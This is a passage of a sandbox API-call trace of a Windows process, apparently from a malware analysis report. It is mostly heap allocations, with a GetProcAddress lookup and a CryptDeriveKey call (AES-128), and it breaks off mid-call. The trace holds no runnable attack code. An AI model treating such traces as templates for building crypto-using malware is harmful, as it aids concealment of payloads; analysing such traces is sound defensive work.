[0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0180.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0180.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0180.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0180.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0180.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0180.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0180.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0180.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.850] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0180.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0180.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0180.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf) returned 0x9bd9f0 [0180.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd9f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.854] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0180.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0180.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.855] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.855] RtlAllocateHeap (HeapHandle=0x8a0000, 